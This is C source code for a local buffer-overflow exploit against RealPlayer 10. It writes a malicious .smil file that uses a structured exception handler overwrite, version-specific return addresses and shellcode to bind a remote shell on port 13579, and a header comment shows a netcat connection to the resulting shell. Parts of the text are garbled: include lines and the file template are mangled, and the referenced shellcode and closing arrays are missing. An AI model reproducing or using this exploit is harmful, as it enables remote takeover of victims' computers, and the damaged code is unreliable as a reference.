/* RealPlayer .smil file buffer overflow Coded by nolimit@CiSO & Buzzdee greets to COREiSO & #news & flare & class101 & ESI & RVL & everyone else I forget This uses a seh overwrite method, which takes advantage of the SEH being placed in multiple locations over the different OS's. Because of this, it should be completely universal. :). Also, we added SEH for enterprise and Standard, if you have a diff 2k3 then deal with it and write your own in. C:\tools>nc -vv SERVER 1554 SERVER [192.168.1.93] 1554 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\Program Files\Real\RealPlayer> */ #include #include #include char pre[]= "\n" " \n" " \n" " \n" " \n" " \n" "

\n" "

��ŷ�� " ""; char overflow[1700]; int main(int argc,char *argv[]) { FILE *vuln; if(argc == 1) { printf("RealPlayer 10 .smil file local buffer overflow.\n"); printf("Coded by nolimit & buzzdee.\n"); printf("Usage: %s \n",argv[0]); return 1; } vuln = fopen(argv[1],"w"); //build overflow buffer here. memset(overflow,0x90,sizeof(overflow)); //fill with nops memcpy(overflow+1068,"\xeb\x08\xeb\x08",4); // memcpy(overflow+1072,"\x4a\xe1\xc9\x61",4); // se handler in win xp (pop pop ret) memcpy(overflow+1084,"\xeb\x08\xeb\x08",4); // memcpy(overflow+1088,"\xae\x7f\xA2\x60",4); // se handler in win2k3 (pop pop ret) for small biz or something memcpy(overflow+1100,"\xeb\x08\xeb\x08",4); // memcpy(overflow+1104,"\xae\x7f\xA2\x60",4); // se handler in win2k3 (pop pop ret) enterprise memcpy(overflow+1108,"\xeb\x08\xeb\x08",4); //jump +8 into nops memcpy(overflow+1112,"\xbf\xbb\xA2\x60",4); //overwrite seh (win2k) with call ebx (pncrt.dll - hopefully universal ...^^) memcpy(overflow+1125,shellcode,sizeof(shellcode)); //our shellcode after some nope to land in if(vuln) { //Write file fprintf(vuln,"%s%s\"/>\n%s",pre,overflow,end); fclose(vuln); } printf("File written.Binds a shell on port 13579.\nOpen with realplayer to exploit.\n"); return 0; }